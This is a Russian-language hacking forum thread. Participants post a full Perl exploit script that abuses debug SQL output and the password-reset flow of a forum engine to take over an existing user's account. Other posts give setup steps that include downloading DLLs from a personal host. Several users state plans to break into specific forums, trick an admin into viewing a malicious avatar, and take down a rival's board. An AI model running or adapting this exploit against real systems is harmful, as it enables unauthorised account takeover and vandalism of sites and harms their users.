думаю сцена переживает некий переломный момент, либо в скором времени появиться команда которая с новой силой будет находить баги и выпускать интересные релизы, либо хак уйдет в полный андеграунд. ИМХО сейчас хак является попсовой вещью. Интересно посмотреть, что будет через год или более.
Я не удивлюсь если скоро появится новый двиг форума и новая команда которая будет выкладывать баги к нему
HELP: Code: Это описание для тех, кто не знает, как сделать так чтобы заработал php_curl: 1. Качаем http://limpompo.jino-net.ru/php_curl.rar 2. Копируем libeay32.dll и ssleay32.dll в диру c:\windows\system32\ 3. Копируем php_curl.dll в диру [you_apache_dir]\php\extensions 4. Редактируем PHP.ini - Удаляем Комент с extension=php_curl.dll 5. Перезагрузи Апачу! 6. Уря =) Работает... ыыыыыы С Уважением limpompo.
Плиз помогите ЛАМУ как вообще пользоватся Php скриптами? Дайте хоть ссылку на видео плиз или опишите как их использовать. З.Ы. буду очень признателен
Вот прочитай: http://forum.antichat.ru/thread26510.html сплоиту нужен php_curl.dll, как его прикрутить к php смотри выше...
На всяк пожарный выложу: (тока я его не тестил!!!) Code: #!perl -w use strict; use LWP::UserAgent; my $target="http://127.0.0.1/board/index.php"; # victim my $name="hax0r"; # existing user my $pass="31337"; # password to set my $proxy=""; # optional: http proxy my($prefix,$suffix,$regid,$regcode); my $ua=LWP::UserAgent->new(); $ua->proxy("http",$proxy) if($proxy); my $response=$ua->get($target."?act=Reg&CODE=10"); if($response->is_success) { if($response->content=~/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>(.+?)_reg_antispam<\/span> \(regid,regcode,ip_address,ctime\) VALUES\(\'(.{32}?)\',(.+?),/im) { $prefix=$1; $regid=$2; $regcode=$3; } else { $suffix="&debug=1"; $response=$ua->get($target."?act=Reg&CODE=10".$suffix); if($response->is_success) { if($response->content=~/INSERT INTO (.+?)_reg_antispam \(regid,regcode,ip_address,ctime\) VALUES\(\'(.{32})\',(.+?),/im) { $prefix=$1; $regid=$2; $regcode=$3; } else { exit print "\nExploit failed!\n" } } else { exit print "\nExploit failed!\n" } } } else { exit print "\nExploit failed!\n" } $target=$target.$suffix if($suffix); $response=$ua->post($target,[act=>"Reg", CODE=>11, member_name=>$name, regid=>$regid, reg_code=>$regcode]); if($response->is_success) { if($response->content=~/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\) VALUES\(\'(.{32})\',(.{1,32}),/im) { changePass($regcode,$regid,$1,$2) } elsif($response->content=~/INSERT INTO '.$prefix.'_validating \(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\) VALUES\(\'(.{32})\',(.{1,32}),/im) { changePass($regcode,$regid,$1,$2) } else { exit print "\nExploit failed!\n" } } else { print "\nExploit failed!\n" } sub changePass { my($regcode,$regid,$vid,$userid)=@_; my $ua=LWP::UserAgent->new(); $ua->proxy("http",$proxy) if($proxy); my $response=$ua->post($target,[act=>"Reg", CODE=>03, type=>"lostpass", uid=>$userid, aid=>$vid, regid=>$regid, reg_code=>$regcode, pass1=>$pass, pass2=>$pass]); if($response->is_success) { exit print "\nExploited!\n" } else { exit print "\nExploit failed!\n" } }
Есть какой нить способ что бы ломать не лишь бы что,а интересуют пара конкретных форумов...чет через аваторки не прокатывает (или подскажите как заставить админа посмотреть) видимо с СИ плохо ((( а Xss не разбираюсь(((
limpompo, можешь в ПМ кинуть архив, или ссылку плз? А то чувствую, так и не дождусь я от юзеров такого подарка Х_х Ибо срочно надо, форум падонка грохнуть. А из-за его отсталости я его уговорил врубить эту функцию
Пользы от этого сплойта только посмотреть как с cURL работать на PHP и всё, а найти уязвимый этому форум просто палево.
Kp0t Я знаю уязвимый форум, токо он на бесплатном хосте... Там админ му**к еще тот. Если хочешь душу на этом форуме отвести, в личку стукни HiM@S:Closed хватить флудить,всё что надо для работы сплойта в теме описано .